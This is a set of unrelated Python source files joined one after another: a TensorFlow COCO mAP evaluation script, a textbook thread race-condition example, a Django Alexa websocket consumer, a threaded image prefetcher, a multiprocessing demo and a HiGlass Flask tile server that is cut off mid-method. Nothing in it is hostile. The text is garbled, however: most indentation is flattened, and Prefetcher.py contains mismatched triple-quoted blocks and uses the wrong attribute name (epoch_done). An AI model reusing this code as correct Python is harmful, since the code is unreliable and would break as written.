# or you can set hard limit
#tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.4
with tf.Session(config=tfconfig) as sess:
initialize(load=True,load_best=config.load_best,config=config,sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
num_steps = int(math.ceil(test_data.num_examples/float(config.im_batch_size)))*config.num_epochs
# a list of imageids
pred = forward_coco(test_data,num_steps,config,sess,tester,resize=True)
#with open("coco.json","w") as f:
# json.dump(pred,f)
if config.use_coco_eval:
evalcoco(pred,config.datajson,add_mask=config.add_mask)
else:
            # check our AP implementation; use our own mAP implementation
# load the annotation first
all_cat_ids = {}
with open(config.datajson,"r") as f:
data = json.load(f)
gt = {} # imageid -> boxes:[], catids
for one in data['annotations']:
cat_id = one['category_id']
all_cat_ids[cat_id] = 1
imageid = int(one['image_id'])
                if imageid not in gt:
gt[imageid] = {} # cat_ids -> boxes[]
#gt[imageid]['boxes'].append(one['bbox']) # (x,y,w,h), float
#gt[imageid]['cat_ids'].append(one['category_id'])
                if cat_id not in gt[imageid]:
gt[imageid][cat_id] = []
gt[imageid][cat_id].append(one['bbox'])
print("total category:%s"%len(all_cat_ids))
# get the aps/ars for each frame
dt = {} # imageid -> cat_id -> {boxes,scores}
for one in pred:
imageid = one['image_id']
dt_bbox = one['bbox']
score = one['score']
cat_id = one['category_id']
                if imageid not in dt:
dt[imageid] = {}
                if cat_id not in dt[imageid]:
dt[imageid][cat_id] = []
dt[imageid][cat_id].append((dt_bbox,score))
# get eval for each image
"""
aps = {class_:[] for class_ in all_cat_ids}
ars = {class_:[] for class_ in all_cat_ids}
for imageid in gt:
for cat_id in gt[imageid]:
if not dt.has_key(imageid):
ars[cat_id].append(0.0)
else:
d = []
dscores = []
if dt[imageid].has_key(cat_id):
# sort the boxes based on the score first
dt[imageid][cat_id].sort(key=operator.itemgetter(1),reverse=True)
for boxes,score in dt[imageid][cat_id]:
d.append(boxes)
dscores.append(score)
g = gt[imageid][cat_id]
dm,gm = match_detection(d, g, cocomask.iou(d,g,[0 for _ in xrange(len(g))]),iou_thres=0.5)
ap = computeAP(dm)
ar = computeAR(dm,gm,recall_k=10)
aps[cat_id].append(ap)
ars[cat_id].append(ar)
# aggregate the aps and ars
aps = [sum(aps[cat_id])/float(len(aps[cat_id])) for cat_id in aps.keys()]
ars = [sum(ars[cat_id])/float(len(ars[cat_id])) for cat_id in ars.keys()]
mean_ap = sum(aps)/len(aps)
mean_ar = sum(ars)/len(ars)
"""
# accumulate all detection and compute AP once
e = {} # imageid -> catid
start = time.time()
for imageid in gt:
e[imageid] = {}
for cat_id in gt[imageid]:
g = gt[imageid][cat_id]
e[imageid][cat_id] = {
"dscores":[],
"dm":[],
"gt_num":len(g),
}
d = []
dscores = []
                    if imageid in dt and cat_id in dt[imageid]:
# sort the boxes based on the score first
dt[imageid][cat_id].sort(key=operator.itemgetter(1),reverse=True)
for boxes,score in dt[imageid][cat_id]:
d.append(boxes)
dscores.append(score)
                    dm,gm = match_detection(d,g,cocomask.iou(d,g,[0 for _ in range(len(g))]),iou_thres=0.5)
e[imageid][cat_id]['dscores'] = dscores
e[imageid][cat_id]['dm'] = dm
# accumulate results
maxDet = 100 # max detection per image per category
aps = {}
ars = {}
for catId in all_cat_ids:
# put all detection scores from all image together
                dscores = np.concatenate([e[imageid][catId]['dscores'][:maxDet] for imageid in e if catId in e[imageid]])
# sort
inds = np.argsort(-dscores,kind="mergesort")
dscores_sorted = dscores[inds]
# put all detection annotation together based on the score sorting
                dm = np.concatenate([e[imageid][catId]['dm'][:maxDet] for imageid in e if catId in e[imageid]])[inds]
                num_gt = np.sum([e[imageid][catId]['gt_num'] for imageid in e if catId in e[imageid]])
aps[catId] = computeAP(dm)
ars[catId] = computeAR_2(dm,num_gt)
mean_ap = np.mean([aps[catId] for catId in aps])
mean_ar = np.mean([ars[catId] for catId in ars])
took = time.time() - start
print("total dt image:%s, gt image:%s"%(len(dt),len(gt)))
print("mean AP with IoU 0.5:%s, mean AR with max detection %s:%s, took %s seconds"%(mean_ap,maxDet,mean_ar,took))
# https://stackoverflow.com/questions/38160940/how-to-count-total-number-of-trainable-parameters-in-a-tensorflow-model
def cal_total_param():
total = 0
for var in tf.trainable_variables():
shape = var.get_shape()
var_num = 1
for dim in shape:
var_num*=dim.value
total+=var_num
return total
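# note: dim.value assumes TF1-style Dimension objects; under TF2's shape behavior, iterating get_shape() yields plain ints and .value would fail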
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
import threading
from utils import parse_nvidia_smi, sec2time
gpu_util_logs = []
gpu_temp_logs = []
# use nvidia-smi to periodically log GPU utilization and temperature
def log_gpu_util(interval, gpuid_range):
global gpu_util_logs
while True:
time.sleep(interval)
gpu_temps, gpu_utils = parse_nvidia_smi(gpuid_range)
gpu_util_logs.extend(gpu_utils)
gpu_temp_logs.extend(gpu_temps)
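        # parse_nvidia_smi is assumed to return utilization as 0-1 fractions and temperatures in degrees C (the summary in __main__ multiplies utilization by 100)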
if __name__ == "__main__":
config = get_args()
if config.mode == "pack":
config.is_pack_model = True
if config.is_pack_model:
pack(config)
else:
if config.log_time_and_gpu:
gpu_log_interval = 10 # every k seconds
start_time = time.time()
gpu_check_thread = threading.Thread(target=log_gpu_util, args=[gpu_log_interval, (config.gpuid_start, config.gpu)])
gpu_check_thread.daemon = True
gpu_check_thread.start()
if config.mode == "train":
train_diva(config)
elif config.mode == "test":
test(config)
elif config.mode == "forward":
forward(config)
elif config.mode == "boxfeat": # given image list and each image's box, extract CNN feature
boxfeat(config)
elif config.mode == "givenbox":
givenbox(config) # given image, boxes, get the mask output
elif config.mode == "videofeat":
videofeat(config)
else:
raise Exception("mode %s not supported"%(config.mode))
if config.log_time_and_gpu:
end_time = time.time()
print("total run time %s (%s), log gpu utilize every %s seconds and get median %.2f%% and average %.2f%%. GPU temperature median %.2f and average %.2f (C)" % (
sec2time(end_time - start_time),
end_time - start_time,
gpu_log_interval,
np.median(gpu_util_logs)*100,
np.mean(gpu_util_logs)*100,
np.median(gpu_temp_logs),
np.mean(gpu_temp_logs),
))
|
item_38.py
|
#!/usr/bin/env python3
# Copyright 2014 Brett Slatkin, Pearson Education Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Preamble to mimic the book environment
import logging
from pprint import pprint
from sys import stdout as STDOUT
# Example 1
class Counter(object):
def __init__(self):
self.count = 0
def increment(self, offset):
self.count += offset
# Example 2
def worker(sensor_index, how_many, counter):
# I have a barrier in here so the workers synchronize
# when they start counting, otherwise it's hard to get a race
# because the overhead of starting a thread is high.
BARRIER.wait()
for _ in range(how_many):
# Read from the sensor
counter.increment(1)
# Example 3
from threading import Barrier, Thread
BARRIER = Barrier(5)
def run_threads(func, how_many, counter):
threads = []
for i in range(5):
args = (i, how_many, counter)
thread = Thread(target=func, args=args)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
# Example 4
how_many = 10**5
counter = Counter()
run_threads(worker, how_many, counter)
print('Counter should be %d, found %d' %
(5 * how_many, counter.count))
# Example 5
offset = 5
counter.count += offset
# Example 6
value = getattr(counter, 'count')
result = value + offset
setattr(counter, 'count', result)
# Example 7
# Running in Thread A
value_a = getattr(counter, 'count')
# Context switch to Thread B
value_b = getattr(counter, 'count')
result_b = value_b + 1
setattr(counter, 'count', result_b)
# Context switch back to Thread A
result_a = value_a + 1
setattr(counter, 'count', result_a)
# Example 8
from threading import Lock
class LockingCounter(object):
def __init__(self):
self.lock = Lock()
self.count = 0
def increment(self, offset):
with self.lock:
self.count += offset
# Example 9
BARRIER = Barrier(5)
counter = LockingCounter()
run_threads(worker, how_many, counter)
print('Counter should be %d, found %d' %
(5 * how_many, counter.count))
|
consumers.py
|
import json
import threading
from alexa_client import AlexaClient
from channels.generic.websocket import WebsocketConsumer
from requests.exceptions import HTTPError
from django.conf import settings
from alexa_browser_client import constants, helpers
class AuthenticationError(IOError):
pass
class MissingRefreshToken(AuthenticationError):
pass
class AuthenticationFailed(AuthenticationError):
pass
class AlexaClientMixin:
alexa_client_class = AlexaClient
def connect(self):
super().connect()
self.send_status(constants.CONNECTING)
self.alexa_client = self.alexa_client_class(
client_id=settings.ALEXA_BROWSER_CLIENT_AVS_CLIENT_ID,
secret=settings.ALEXA_BROWSER_CLIENT_AVS_CLIENT_SECRET,
refresh_token=self.refresh_token,
)
try:
self.handle_alexa_connect()
except AuthenticationError:
self.close(code=3000)
def handle_alexa_connect(self):
if not self.refresh_token:
raise MissingRefreshToken()
else:
try:
self.alexa_client.connect()
except HTTPError:
raise AuthenticationFailed()
@property
def refresh_token(self):
if not self.scope['session']:
return None
return self.scope['session'].get(constants.SESSION_KEY_REFRESH_TOKEN)
def disconnect(self, *args, **kwargs):
self.alexa_client.ping_manager.cancel()
return super().disconnect(*args, **kwargs)
class LifecycleMixin:
audio_lifecycle_class = helpers.AudioLifecycle
def connect(self):
super().connect()
self.send_status(constants.EXPECTING_WAKEWORD)
self.audio_lifecycle = self.audio_lifecycle_class(
on_command_started=self.handle_command_started,
on_command_finished=self.handle_command_finished,
)
def receive(self, text_data=None, bytes_data=None):
super().receive(text_data=text_data, bytes_data=bytes_data)
self.audio_lifecycle.extend_audio(bytes_data)
def handle_command_started(self):
self.send_status(constants.EXPECTING_COMMAND)
def handle_command_finished(self):
self.send_status(constants.EXPECTING_WAKEWORD)
class AlexaConsumer(LifecycleMixin, AlexaClientMixin, WebsocketConsumer):
dialog_request_id = None
def receive(self, text_data=None, bytes_data=None):
if text_data == 'ExpectSpeech':
self.audio_lifecycle.handle_command_started(None)
else:
super().receive(text_data=text_data, bytes_data=bytes_data)
def send_status(self, message_id):
self.send(text_data=json.dumps({'type': message_id}))
def handle_command_started(self, wakeword_name):
super().handle_command_started()
thr = threading.Thread(target=self.send_command_to_avs)
thr.start()
def send_command_to_avs(self):
directives = self.alexa_client.send_audio_file(
self.audio_lifecycle.as_file,
dialog_request_id=self.dialog_request_id
)
self.dialog_request_id = None
for directive in (directives or []):
if directive.name == 'ExpectSpeech':
headers = directive.directive['header']
self.dialog_request_id = headers['dialogRequestId']
self.send_status('ExpectSpeech')
if directive.name in ['Speak', 'Play']:
self.send(bytes_data=directive.audio_attachment)
else:
self.send_status(constants.EXPECTING_WAKEWORD)
|
Prefetcher.py
|
import threading
import Queue
import time
import random
import os.path as osp
import numpy as np
from PIL import Image
from ..utils.dataset_utils import parse_im_name
#ospj = osp.join
ospeu = osp.expanduser
# from TrainSet import Trainset.pre_process_im
class Counter(object):
"""A thread safe counter."""
def __init__(self, val=0, max_val=0):
self._value = val
self.max_value = max_val
self._lock = threading.Lock()
def reset(self):
with self._lock:
self._value = 0
def set_max_value(self, max_val):
self.max_value = max_val
def increment(self):
with self._lock:
if self._value < self.max_value:
self._value += 1
incremented = True
else:
incremented = False
return incremented, self._value
def get_value(self):
with self._lock:
return self._value
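# A rough usage sketch for the bounded, thread-safe Counter above (the worker
# function, thread count and `process` handler are illustrative, not part of
# this module): several threads claim work indices until max_value is reached.
#
#   counter = Counter(max_val=100)
#   def claim_work():
#       while True:
#           incremented, value = counter.increment()
#           if not incremented:
#               break                 # all 100 indices have been claimed
#           process(value - 1)        # `process` is a hypothetical per-item handler
#   workers = [threading.Thread(target=claim_work) for _ in range(4)]
#   for w in workers: w.start()
#   for w in workers: w.join()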
class Enqueuer(object):
def __init__(self, get_element, num_elements, num_threads=1, queue_size=20):
"""
Args:
get_element: a function that takes a pointer and returns an element
num_elements: total number of elements to put into the queue
num_threads: num of parallel threads, >= 1
queue_size: the maximum size of the queue. Set to some positive integer
to save memory, otherwise, set to 0.
"""
self.get_element = get_element
assert num_threads > 0
self.num_threads = num_threads
self.queue_size = queue_size
self.queue = Queue.Queue(maxsize=queue_size)
# The pointer shared by threads.
self.ptr = Counter(max_val=num_elements)
# The event to wake up threads, it's set at the beginning of an epoch.
# It's cleared after an epoch is enqueued or when the states are reset.
self.event = threading.Event()
# To reset states.
self.reset_event = threading.Event()
# The event to terminate the threads.
self.stop_event = threading.Event()
self.threads = []
for _ in range(num_threads):
thread = threading.Thread(target=self.enqueue)
# Set the thread in daemon mode, so that the main program ends normally.
thread.daemon = True
thread.start()
self.threads.append(thread)
def start_ep(self):
"""Start enqueuing an epoch."""
self.event.set()
def end_ep(self):
"""When all elements are enqueued, let threads sleep to save resources."""
self.event.clear()
self.ptr.reset()
def reset(self):
"""Reset the threads, pointer and the queue to initial states. In common
case, this will not be called."""
self.reset_event.set()
self.event.clear()
# wait for threads to pause. This is not an absolutely safe way. The safer
# way is to check some flag inside a thread, not implemented yet.
time.sleep(5)
self.reset_event.clear()
self.ptr.reset()
self.queue = Queue.Queue(maxsize=self.queue_size)
def set_num_elements(self, num_elements):
"""Reset the max number of elements."""
self.reset()
self.ptr.set_max_value(num_elements)
'''
#m_dict = TrainSet.get_im_dict()
im_list = list(im_dict.values())
for _ in range(int(self.batch_size/self.images_per_id)):
if self.ptr >= self.dataset_size:
self.epoch_done = True
break
else:
if self.id_ptr >= self.id_number:
self.id_ptr = 0
if len(im_list[self.id_ptr]) < self.images_per_id:
for i in range(self.image_per_id):
im_name = random.sample(im_list[self.id_ptr],1)
im_path = osp.join(self.im_dir, im_name)
im = np.asarray(Image.open(im_path))
im, mirrored = self.pre_process_im(im)
id = parse_im_name(im_name, 'id')
label = self.ids2labels[id]
sample = (im,im_name,label,mirrored)
samples.append(sample)
else:
im_names = random.sample(im_list[self.id_ptr],self.images_per_id)
for j in range(self.image_per_id):
im_path = osp.join(self.im_dir, im_names[j])
im = np.asarray(Image.open(im_path))
im, mirrored = self.pre_process_im(im)
id = parse_im_name(im_name[j], 'id')
label = self.ids2labels[id]
sample = (im, im_name[j], label, mirrored)
samples.append(sample)
self.id_ptr +=1
self.ptr += self.images_per_id
'''
def stop(self):
"""Wait for threads to terminate."""
self.stop_event.set()
for thread in self.threads:
thread.join()
def enqueue(self):
while not self.stop_event.isSet():
# If the enqueuing event is not set, the thread just waits.
if not self.event.wait(0.5):
continue
# Increment the counter to claim that this element has been enqueued by
# this thread.
incremented, ptr = self.ptr.increment()
if incremented:
element = self.get_element(ptr - 1)
# When enqueuing, keep an eye on the stop and reset signal.
while not self.stop_event.isSet() and not self.reset_event.isSet():
try:
# This operation will wait at most `timeout` for a free slot in
# the queue to be available.
self.queue.put(element, timeout=0.5)
break
except:
pass
else:
self.end_ep()
print('Exiting thread {}!!!!!!!!'.format(
threading.current_thread().name))
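# A rough usage sketch for Enqueuer (illustrative; `load_sample` and the
# element count are placeholders, not part of this module). Worker threads
# pull indices from the shared Counter and push loaded elements into the
# queue; the consumer just drains the queue after start_ep():
#
#   enqueuer = Enqueuer(get_element=load_sample, num_elements=1000,
#                       num_threads=4, queue_size=50)
#   enqueuer.start_ep()
#   for _ in range(1000):
#       element = enqueuer.queue.get()
#       ...                       # consume the element
#   enqueuer.stop()               # terminate the worker threads when finished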
class Prefetcher(object):
"""This helper class enables sample enqueuing and batch dequeuing, to speed
up batch fetching. It abstracts away the enqueuing and dequeuing logic."""
def __init__(self, get_sample, pre_process_im, dataset_size, batch_size, final_batch=True,
num_threads=1, prefetch_size=200):
"""
Args:
get_sample: a function that takes a pointer (index) and returns a sample
dataset_size: total number of samples in the dataset
final_batch: True or False, whether to keep or drop the final incomplete
batch
num_threads: num of parallel threads, >= 1
prefetch_size: the maximum size of the queue. Set to some positive integer
to save memory, otherwise, set to 0.
"""
self.full_dataset_size = dataset_size
self.final_batch = final_batch
final_sz = self.full_dataset_size % batch_size
if not final_batch:
dataset_size = self.full_dataset_size - final_sz
self.dataset_size = dataset_size
self.batch_size = batch_size
#self.dataset = name
self.enqueuer = Enqueuer(get_element=get_sample, num_elements=dataset_size,
num_threads=num_threads, queue_size=prefetch_size)
# The pointer indicating whether an epoch has been fetched from the queue
#self.get_sample = get_sample
self.pre_process_im = pre_process_im
self.ptr = 0
self.ep_done = True
# self.id_number = 2533
self.id_ptr = 0
self.images_per_id = 8
#self.im_dir = ospeu('/data2/reid-public/Dataset/pcb-format/{}/images'.format(self.dataset))
def set_batch_size(self, batch_size):
"""You had better change batch size at the beginning of a new epoch."""
final_sz = self.full_dataset_size % batch_size
if not self.final_batch:
self.dataset_size = self.full_dataset_size - final_sz
self.enqueuer.set_num_elements(self.dataset_size)
self.batch_size = batch_size
self.ep_done = True
def next_batch_test(self):
"""Return a batch of samples, meanwhile indicate whether the epoch is
done. The purpose of this func is mainly to abstract away the loop and the
boundary-checking logic.
Returns:
samples: a list of samples
done: bool, whether the epoch is done
"""
# Start enqueuing and other preparation at the beginning of an epoch.
if self.ep_done:
self.start_ep_prefetching()
# Whether an epoch is done.
self.ep_done = False
samples = []
for _ in range(self.batch_size):
# Indeed, `>` will not occur.
if self.ptr >= self.dataset_size:
self.ep_done = True
break
else:
self.ptr += 1
sample = self.enqueuer.queue.get()
# print('queue size {}'.format(self.enqueuer.queue.qsize()))
samples.append(sample)
# print 'queue size: {}'.format(self.enqueuer.queue.qsize())
# Indeed, `>` will not occur.
if self.ptr >= self.dataset_size:
self.ep_done = True
return samples, self.ep_done
def next_batch(self, im_dict, ids2labels, im_dir):
"""Return a batch of samples, meanwhile indicate whether the epoch is
done. The purpose of this func is mainly to abstract away the loop and the
boundary-checking logic.
Returns:
samples: a list of samples
done: bool, whether the epoch is done
"""
# Start enqueuing and other preparation at the beginning of an epoch.
if self.ep_done:
self.start_ep_prefetching()
# Whether an epoch is done.
self.ep_done = False
samples = []
#im_dict = TrainSet.get_im_dict()
im_list = list(im_dict.values())
for _ in range(int(self.batch_size/self.images_per_id)):
if self.ptr >= self.dataset_size:
self.epoch_done = True
break
else:
if self.id_ptr >= len(im_dict.keys()):
self.id_ptr = 0
if len(im_list[self.id_ptr]) < self.images_per_id:
for i in range(self.images_per_id):
im_name = random.sample(im_list[self.id_ptr], 1)
im_path = osp.join(im_dir, im_name[0])
# print im_dir
im = np.asarray(Image.open(im_path))
im, mirrored = self.pre_process_im(im)
id = parse_im_name(im_name[0], 'id')
label = ids2labels[id]
sample = (im, im_name[0], label, mirrored)
samples.append(sample)
else:
im_names = random.sample(
im_list[self.id_ptr], self.images_per_id)
for j in range(self.images_per_id):
im_path = osp.join(im_dir, im_names[j])
# print "im_dir is :"
# print im_dir
im = np.asarray(Image.open(im_path))
im, mirrored = self.pre_process_im(im)
id = parse_im_name(im_names[j], 'id')
label = ids2labels[id]
#im,label,mirrored = self.get_sample(im_names[j])
sample = (im, im_names[j], label, mirrored)
samples.append(sample)
self.id_ptr += 1
self.ptr += self.images_per_id
'''
for _ in range(self.batch_size):
# Indeed, `>` will not occur.
'''
if self.ptr >= self.dataset_size:
self.ep_done = True
break
else:
self.ptr += 1
sample = self.enqueuer.queue.get()
# print('queue size {}'.format(self.enqueuer.queue.qsize()))
samples.append(sample)
# print 'queue size: {}'.format(self.enqueuer.queue.qsize())
# Indeed, `>` will not occur.
'''
if self.ptr >= self.dataset_size:
self.ep_done = True
return samples, self.ep_done
def start_ep_prefetching(self):
"""
NOTE: Has to be called at the start of every epoch.
"""
self.enqueuer.start_ep()
self.ptr = 0
def stop(self):
"""This can be called to stop threads, e.g. after finishing using the
dataset, or when exiting the Python main program."""
self.enqueuer.stop()
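# A minimal epoch loop using Prefetcher.next_batch_test() (illustrative sketch;
# `load_sample`, `preprocess` and the dataset numbers below are placeholders,
# not part of this module):
#
#   prefetcher = Prefetcher(get_sample=load_sample, pre_process_im=preprocess,
#                           dataset_size=10000, batch_size=32, num_threads=2)
#   done = False
#   while not done:
#       samples, done = prefetcher.next_batch_test()
#       ...                       # collate `samples` into a batch and run the model
#   prefetcher.stop()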
|
process01.py
|
"""
Basic example of using the multiprocessing module
"""
# note: pick "multiprocessing" (not the variant whose name contains a dash/underscore)
import multiprocessing
from time import sleep
a = 1
# function executed by the child process
def fun():
    print("The first process starts running")
    sleep(2)
    global a
    print(a)  # prints the child process's copy of a
    a = 100
    print("The first process finished")
# instantiate the process object
p = multiprocessing.Process(target=fun)
# start the process; the child process is only created here, and it runs fun()
p.start()
print("The second process starts running")
sleep(3)
print("The second process finished")
# block and wait to reap the child process
p.join()
print(a)  # prints the parent process's copy of a
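# Expected behaviour (clarifying note, assuming a fork-based start method such
# as the Linux default): the child runs fun(), prints its own copy of a (1) and
# sets it to 100; the parent's final print(a) still shows 1, because the two
# processes do not share global variables.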
|
server.py
|
from functools import partial
from io import StringIO
import multiprocess as mp
import cytoolz as toolz
import os.path as op
import platform
import logging
import logging.handlers
import socket
import tempfile
import json
import time
import os
from flask import Flask
from flask import request, jsonify
# from flask_restful import reqparse, abort, Api, Resource
from flask_cors import CORS
from fuse import FUSE
import requests
import slugid
import sh
__all__ = ["Server"]
OS_NAME = platform.system()
OS_TEMPDIR = tempfile.gettempdir()
# Disable annoying logs from werkzeug server
log = logging.getLogger("werkzeug")
log.setLevel(logging.ERROR)
log.disabled = True
# The following line is also needed to turn off all debug logs
os.environ["WERKZEUG_RUN_MAIN"] = "true"
def create_app(name, tilesets, fuse=None):
app = Flask(name)
app.logger.disabled = True
CORS(app)
remote_tilesets = {}
@app.route("/api/v1/")
def hello():
return "Hello World!"
@app.route("/api/v1/register_url/", methods=["POST"])
def register_url():
from higlass.tilesets import by_filetype
js = request.json
if js["filetype"] not in by_filetype:
return (
jsonify({"error": "Unknown filetype: {}".format(js["filetype"])}),
400,
)
if fuse is None:
return jsonify({"error": "httpfs is not available."})
key = (js["fileUrl"], js["filetype"])
if key in remote_tilesets:
ts = remote_tilesets[key]
else:
mounted_url = fuse.get_filepath(js["fileUrl"])
factory = by_filetype[js["filetype"]]
ts = factory(mounted_url)
remote_tilesets[key] = ts
return jsonify({"uid": ts.uuid})
@app.route("/api/v1/available-chrom-sizes/", methods=["GET"])
def available_chrom_sizes():
"""
Get the list of available chromosome size lists. No query parameters.
"""
results = []
for ts in tilesets:
if ts.datatype == "chromsizes":
results.append(ts.meta)
return jsonify({"count": len(results), "results": results})
@app.route("/api/v1/chrom-sizes/", methods=["GET"])
def chrom_sizes():
"""
Coordinate system resource.
Query Parameters
----------------
id : string
Tileset UUID
type : { tsv | json }
Response format. Default is tsv.
cum : boolean
Return cumulative lengths. Default is false.
"""
uuid = request.args.get("id", None)
res_type = request.args.get("type", "tsv")
incl_cum = request.args.get("cum", False)
# filter for tileset
ts = next((ts for ts in _list_tilesets() if ts.uuid == uuid), None)
if ts is None:
return jsonify({"error": "Not found"}), 404
if not hasattr(ts, "chromsizes"):
return jsonify({"error": "Tileset does not have chrom sizes."})
# list of tuples (chrom, size)
data = ts.chromsizes
if incl_cum:
data, _data, cum = [], data, 0
for chrom, size in _data:
cum += size
data.append((chrom, size, cum))
if res_type == "json":
if incl_cum:
j = {
ts.uuid: {
chrom: {"size": size, "offset": offset}
for chrom, size, offset in data
}
}
else:
j = {ts.uuid: {chrom: {"size": size} for chrom, size in data}}
return jsonify(j)
elif res_type == "tsv":
if incl_cum:
return "\n".join(
"{}\t{}\t{}".format(chrom, size, offset)
for chrom, size, offset in data
)
else:
return "\n".join("{}\t{}".format(chrom, size) for chrom, size in data)
else:
return jsonify({"error": "Unknown response type"}), 500
@app.route("/api/v1/uids_by_filename/", methods=["GET"])
def uids_by_filename():
return jsonify(
{
"count": len(tilesets),
"results": {i: tilesets[i] for i in range(len(tilesets))},
}
)
def _list_tilesets():
return tilesets + list(remote_tilesets.values())
@app.route("/api/v1/tilesets/", methods=["GET"])
def list_tilesets():
tsets = _list_tilesets()
return jsonify(
{
"count": len(tsets),
"next": None,
"previous": None,
"results": [ts.meta for ts in tsets],
}
)
@app.route("/api/v1/tileset_info/", methods=["GET"])
def tileset_info():
uuids = request.args.getlist("d")
info = {}
for uuid in uuids:
ts = next((ts for ts in _list_tilesets() if ts.uuid == uuid), None)
if ts is not None:
info[uuid] = ts.tileset_info()
else:
info[uuid] = {"error": "No such tileset with uid: {}".format(uuid)}
return jsonify(info)
@app.route("/api/v1/tiles/", methods=["GET"])
def tiles():
tids_requested = set(request.args.getlist("d"))
if not tids_requested:
return jsonify({"error": "No tiles requested"}), 400
extract_uuid = lambda tid: tid.split(".")[0]
uuids_to_tids = toolz.groupby(extract_uuid, tids_requested)
tiles = []
for uuid, tids in uuids_to_tids.items():
ts = next((ts for ts in _list_tilesets() if ts.uuid == uuid), None)
tiles.extend(ts.tiles(tids))
data = {tid: tval for tid, tval in tiles}
return jsonify(data)
return app
class ServerError(Exception):
pass
def get_open_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class FuseProcess:
def __init__(self, tmp_dir):
self.tmp_dir = tmp_dir
self.http_directory = op.join(tmp_dir, "http")
self.https_directory = op.join(tmp_dir, "https")
self.diskcache_directory = op.join(tmp_dir, "dc")
def setup(self):
"""
Set up filesystem in user space for http and https
so that we can retrieve tiles from remote sources.
Parameters
----------
tmp_dir: string
The temporary directory where to create the
http and https directories
"""
from simple_httpfs import HttpFs
if not op.exists(self.http_directory):
os.makedirs(self.http_directory)
if not op.exists(self.https_directory):
os.makedirs(self.https_directory)
if not op.exists(self.diskcache_directory):
os.makedirs(self.diskcache_directory)
self.teardown()
disk_cache_size = 2 ** 25
lru_capacity = 400
def start_fuse(directory, protocol):
try:
# This is a bit confusing. I think `fuse` (lowercase) is used
# above in get_filepath() line 50 and 52. If that's not the
# case then this assignment is useless and get_filepath() is
# broken
fuse = FUSE(
HttpFs(
protocol,
disk_cache_size=disk_cache_size,
disk_cache_dir=self.diskcache_directory,
lru_capacity=lru_capacity,
),
directory,
foreground=False,
# allow_other=True
)
except RuntimeError as e:
if str(e) != "1":
raise e
proc1 = mp.Process(target=start_fuse, args=[self.http_directory, "http"])
proc1.start()
proc1.join()
proc2 = mp.Process(target=start_fuse, args=[self.https_directory, "https"])
proc2.start()
proc2.join()
def teardown(self):
try:
if OS_NAME == "Darwin":
sh.umount("HttpFs")
sh.umount(self.http_directory)
else:
sh.fusermount("-uz", self.http_directory)
except Exception:
pass
try:
if OS_NAME == "Darwin":
sh.umount("HttpFs")
sh.umount(self.https_directory)
else:
sh.fusermount("-uz", self.https_directory)
except Exception:
pass
def get_filepath(self, url):
"""
Get the httpfs mount filepath from a url
"""
if url[:7] == "http://":
return self.http_directory + url[6:] + ".."
elif url[:8] == "https://":
return self.https_directory + url[7:] + ".."
else:
raise ValueError("Unsupported URL protocol")
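# Illustrative mapping (added note; the actual prefix depends on the tmp_dir
# passed to FuseProcess):
#   get_filepath("https://example.com/data.mcool")
#     -> "<tmp_dir>/https/example.com/data.mcool.."
# The trailing ".." appears to be the convention simple_httpfs uses to address
# remote files inside the FUSE mount.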
class Server:
"""
A lightweight HiGlass server.
Parameters
----------
tilesets : list
A list of tilesets to serve (see higlass.tilesets)
host : str, optional
The host this server is running on. Usually just localhost.
port : int, optional
The port that this server will run on.
name : str, optional
A name for the Flask app being served. If not provided, a
unique name will be generated. The app's logger inherits this
name.
fuse : bool, optional
Whether to mount http(s) resources using FUSE.
tmp_dir : string, optional
A temporary directory for FUSE to mount the http(s) files and
for caching.
log_level: logging.*
What level to log at
log_file: str, optional
Where to write diagnostic log files. Default is to use a
StringIO stream in memory.
"""
# Keep track of the server processes that have been started.
# So that when someone says 'start', the old ones are terminated
processes = {}
def __init__(
self,
tilesets,
host="localhost",
port=None,
name=None,
fuse=True,
tmp_dir=OS_TEMPDIR,
log_level=logging.INFO,
log_file=None,
):
self.name = name or __name__.split(".")[0] + '-' + slugid.nice()[:8]
self.tilesets = tilesets
self.host = host
self.port = port
if fuse:
self.fuse_process = FuseProcess(op.join(tmp_dir, 'higlass-python'))
self.fuse_process.setup()
else:
self.fuse_process = None
self.app = create_app(self.name, self.tilesets, fuse=self.fuse_process)
if log_file:
self.log = None
handler = logging.handlers.RotatingFileHandler(
log_file, maxBytes=100000, backupCount=1
)
else:
self.log = StringIO()
handler = logging.StreamHandler(self.log)
handler.setLevel(log_level)
self.app.logger.addHandler(handler)
def start(self, debug=False, **kwargs):
"""
Start a lightweight higlass server.
Parameters
----------
debug: bool
Run the server in debug mode. Default is False.
kwargs :
Additional options to pass to app.run
"""
for puid in list(self.processes.keys()):
self.processes[puid].terminate()
del self.processes[puid]
if self.port is None:
self.port = get_open_port()
# we're going to assign a uuid to each server process so that if
# anything goes wrong, the variable referencing the process doesn't get
# lost
uuid = slugid.nice()
target = partial(
self.app.run,
debug=debug,
host=self.host,
port=self.port,
threaded=True,
use_reloader=False,
**kwargs
)
self.processes[uuid] = mp.Process(target=target)
self.processes[uuid].start()
self.connected = False
while not self.connected:
try:
url = "http://{}:{}/api/v1".format(self.host, self.port)
r = requests.head(url)
if r.ok:
self.connected = True
except requests.ConnectionError:
time.sleep(0.2)
def stop(self):
"""
Stop this server so that the calling process can exit
"""
if self.fuse_process is not None:
self.fuse_process.teardown()
for uuid in self.processes:
self.processes[uuid].terminate()
def tileset_info(self, uid):
"""
Return the tileset info for the given tileset
"""
url = "http://{host}:{port}/api/v1/tileset_info/?d={uid}".format(
host=self.host, port=self.port, uid=uid
)
req = requests.get(url)
if req.status_code != 200:
raise ServerError("Error fetching tileset_info:", req.content)
content = json.loads(req.content)
return content[uid]
def tiles(self, uid, z, x, y=None):
"""
Return tiles from the specified dataset (uid) at
the given position (z,x,[u])
"""
tile_id = "{uid}.{z}.{x}".format(uid=uid, z=z, x=x)
if y is not None:
tile_id += ".{y}".format(y=y)
